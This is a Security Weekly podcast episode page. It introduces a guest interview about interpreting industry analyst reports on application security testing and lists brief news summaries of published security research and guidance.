A Tree of Woe – ASW #137
This week, we welcome back Taylor McCaslin, Sr. Product Manager of Secure at GitLab, to discuss Reading Industry Analyst Tea Leaves To Predict The Future! It's analyst season with the new Forrester Wave on SAST recently published as well as Gartner's Application Security Testing Magic Quadrant publishing in April. We'll talk about what are analyst reports, how should you use them, and how should you interpret placement on them as as I like to call it, reading the analyst tea leaves.
In the AppSec News, an overflow and a flawed regex paint an RCE picture for Kindle, messaging apps miss the message on secure state machines, three pillars of a data security strategy for the cloud, where DoH might fit into AppSec, and all the things that can go wrong when you give up root in your Kubernetes pod!
Visit https://securityweekly.com/GitLab to learn more about them!
Visit https://www.securityweekly.com/asw for all the latest episodes!
Follow us on Twitter: https://www.twitter.com/securityweekly
Like us on Facebook: https://www.facebook.com/secweekly
It's analyst season with the new Forrester Wave on SAST recently published as well as Gartner's Application Security Testing Magic Quadrant publishing in April. We'll talk about what are analyst reports, how should you use them, and how should you interpret placement on them as as I like to call it, reading the analyst tea leaves.
This segment is sponsored by GitLab.
Visit https://securityweekly.com/GitLab to learn more about them!
Don't miss any of your favorite Security Weekly content! Visit https://securityweekly.com/subscribe to subscribe to any of our podcast feeds and have all new episodes downloaded right to your phone! You can also join our mailing list, Discord server, and follow us on social media & our streaming platforms!
Don't forget to check out our library of on-demand webcasts & technical trainings at securityweekly.com/ondemand.
Taylor McCaslin (he/him) is a multi-disciplinary Investor, Product Manager, and Technologist living in Austin, Texas. Taylor works as a Senior Product Manager at GitLab focused on Security products. He is also the Founder of Product Trust Investments, an angel fund focused on impact investing with companies that build ethical products that customers trust. Since 2012 he has worked at enterprise-scale, hyper-growth technology companies including: New Knowledge, Duo Security, WP Engine, Indeed.com, Bazaarvoice. Taylor can be found geeking out with the latest Apple gadget, skiing, or enjoying the expansive Austin art scene. He also enjoys volunteering with local human rights and LGBTQ organizations around central Texas as well as mentoring young technologists looking to start careers in the tech.
An overflow and a flawed regex paint an RCE picture for Kindle, messaging apps miss the message on secure state machines, three pillars of a data security strategy for the cloud, where DoH might fit into appsec, and all the things that can go wrong when you give up root in your Kubernetes pod.
Do you have a specific guest or topic that you want us to cover on one of the shows? Submit your suggestions for guests by visiting https://securityweekly.com/guests and completing the form! We review suggestions monthly and will reach out to you once reviewed!
If you missed Security Weekly Unlocked, you can now access all of the content on-demand, whether you registered before the live event or not, by visiting https://securityweekly.com/unlocked and clicking either the button to register or the button to login!
- 1. KindleDrip — From Your Kindle’s Email Address to Using Your Credit Card - A researcher pokes around Kindle's firmware, finds an image decoding library with an overflow flaw, and paints a picture of RCE. And for extra credit, the researcher also found a flaw in a regex intended to prevent injection attacks.
- 2. The State of State Machines - Project Zero picks apart the protocol implementations for several messaging apps and discovers that most of their state machines can be confused into leaking audio or video to unauthenticated users. It's also a good overview of WebRTC and protocol analysis in general. We even touched on state machines and fuzzing in the previous episode 136, https://securityweekly.com/asw136.
- 3. Bad Pods: Kubernetes Pod Privilege Escalation - A nice overview of Kubernetes pod security assumptions and what happens when a lack of least privilege turns into mostly accessed.
- 4. NSA Recommends How Enterprises Can Securely Adopt Encrypted DNS - You might not be in charge of your org's shift to DNS over HTTPs (DoH), but it does present a chance to apply threat modeling exercises to where you'll gain or lose visibility in the security of your DevOps endpoints and the network connections being made throughout the CI/CD pipeline. You can find the report at https://media.defense.gov/2021/Jan/14/2002564889/-1/-1/0/CSI_ADOPTING_ENCRYPTED_DNS_U_OO_102904_21.PDF
- 5. Designing and deploying a data security strategy with Google Cloud - You can skip over the specific references to Google Cloud products and still gain a good understanding of how to approach a data security program for your own environment regardless of cloud service provider. You can find the paper at https://services.google.com/fh/files/misc/designing_and_deploying_data_security_strategy.pdf
- 6. Real World Crypto 2021 - Real World Crypto ran from January 11th through the 14th. Two sessions in particular are relevant to areas we've touched on in the podcast, one talks in more detail about the end-to-end encryption for Zoom and the other talks about the importance of understanding user needs in designing systems. - "E2E Encryption and Identity Properties for Zoom Meetings" with slides (https://iacr.org/submit/files/slides/2021/rwc/rwc2021/91/slides.pdf) and video (https://youtu.be/jeQvDLPQsuw?t=1814) - "Mental Models of Cryptographic Protocols - Understanding Users to Improve Security" with slides (https://iacr.org/submit/files/slides/2021/rwc/rwc2021/95/slides.pdf) and video (https://youtu.be/-mBlQVEXcB8?t=3)
- 7. Firefox fails to load favicon from HTTP cache - What sounds at first like an innocuous bug report turns into an interesting situation on vuln research, disclosure, and ethics. And it's something that could generalize to bug bounty and other vuln disclosure programs.
- 1. Reliance on cloud, APIs create confusion and introduce risk into software development - Radware did a study (PDF link in the article) on appsec and API security. Some interesting takeaways and stats, sometimes they're taking existing data and making you think about it a different way - eg 71% of respondents mostly/completely trust the level of security offered by their CSPs - but this translates to "71% mostly trust that their customer data won't be compromised by a bad actor" "API security will be first area of investment" for 2021 - security expertise is #3. Interesting predictions, including "The mad dash to the cloud will undermine application security in 2021" and "Human errors will become more frequent and more costly" Also a reminder to go back and watch Mike's great api security panel from securityweekly unlocked!